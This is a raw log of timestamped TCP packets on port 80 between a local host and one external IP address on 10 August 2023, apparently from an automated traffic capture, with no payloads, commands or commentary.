                                                                                                                                                                                          Aug 10, 2023 10:20:05.006325960 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.006341934 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.006629944 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:05.008004904 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.008055925 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.008305073 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:05.009665966 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.009783030 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.009968996 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:05.011246920 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.011373043 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.011559963 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:05.012783051 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.012898922 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.013067007 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:05.014301062 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.014415026 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.014609098 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:05.015789986 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.015803099 CEST804973891.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:05.015997887 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:06.373049021 CEST4973880192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.388797998 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.434506893 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.434770107 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.434864044 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.480391979 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.481455088 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.481540918 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.481600046 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.481656075 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.481709957 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.481745005 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.481806993 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.481812954 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.481879950 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.481937885 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.481944084 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.482008934 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.482069016 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.482183933 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.482230902 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.527467012 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.527579069 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.527651072 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.527729988 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.527786016 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.527878046 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.527931929 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.527995110 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.528131008 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.528197050 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.528256893 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.528316021 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.528376102 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.528434038 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.528493881 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.528547049 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.528579950 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.528590918 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.528640985 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.528640985 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.528697968 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.528738976 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.528781891 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.528842926 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.528903008 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.528938055 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.528984070 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.529011965 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.529067039 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.529237986 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.574376106 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.574455976 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.574512005 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.574567080 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.574621916 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.574632883 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.574677944 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.574709892 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.574737072 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.574793100 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.574824095 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.574848890 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.574906111 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.574930906 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.574961901 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575016975 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575047016 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575072050 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575128078 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575153112 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575184107 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575251102 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575264931 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575309992 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575366020 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575403929 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575423002 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575479984 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575504065 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575535059 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575591087 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575612068 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575645924 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575695992 CEST804973991.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575737953 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:07.575820923 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:08.952410936 CEST4973980192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:09.966305017 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.013896942 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.014363050 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.014877081 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.014933109 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.014974117 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.062498093 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.062534094 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.062688112 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.062772989 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.062805891 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.062834978 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.062856913 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.062887907 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.062916040 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.063026905 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.063268900 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.110614061 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.110697985 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.110742092 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.110811949 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.110852957 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.110852957 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.110939980 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.110944986 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.110981941 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.110995054 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.111042976 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.111083031 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.111124992 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.111191988 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.111205101 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.111232996 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.111300945 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.111320972 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.111341000 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.111397982 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.111469030 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.111542940 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.159286022 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.159348965 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.159411907 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.159452915 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.159517050 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.159560919 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.159600019 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.159670115 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.159708023 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.159778118 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.159820080 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.159857988 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.160793066 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.160913944 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161020994 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161082983 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161119938 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161138058 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161192894 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161248922 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161286116 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161333084 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161341906 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161439896 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161526918 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161541939 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.161689997 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.209132910 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.209247112 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.209367990 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.209492922 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.209496975 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.209572077 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.209628105 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.209673882 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.209685087 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.209742069 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.209795952 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.209850073 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.209886074 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.209886074 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.209904909 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.209959984 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.210014105 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.210067987 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.210067034 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.210123062 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.210177898 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.210220098 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.210221052 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.210232019 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.210287094 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.210341930 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.210381985 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.210396051 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.210494995 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.210532904 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.258151054 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.258305073 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.258363962 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.258419991 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.258474112 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.258518934 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.258559942 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.258589983 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.258619070 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.258673906 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.258728027 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.258781910 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.258811951 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.258836031 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.258858919 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.258892059 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.258945942 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.258972883 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.259001017 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.259056091 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.259088993 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.259111881 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.259143114 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.259166956 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.259222031 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.259268999 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.259275913 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.259331942 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.259386063 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.259438992 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.259443998 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.259490967 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.259493113 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.259541988 CEST804974091.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:10.259630919 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:10.259630919 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:11.528146982 CEST4974080192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.543875933 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.589796066 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.590023994 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.590080023 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.635955095 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.637526989 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.637629986 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.637691021 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.637746096 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.637800932 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.637856960 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.637912035 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.637953997 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.637953997 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.637969017 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.638025999 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.638087034 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.638113022 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.638277054 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.638406038 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.683875084 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.683983088 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684124947 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684226990 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684300900 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684355974 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684381008 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684381008 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684411049 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684464931 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684518099 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684575081 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684629917 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684684992 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684715986 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684715986 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684741020 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684796095 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684849977 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684887886 CEST4974180192.168.11.2091.189.114.27
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684904099 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.684958935 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.685012102 CEST804974191.189.114.27192.168.11.20
                                                                                                                                                                                          Aug 10, 2023 10:20:12.685061932 CEST4974180192.168.11.2091.189.114.27
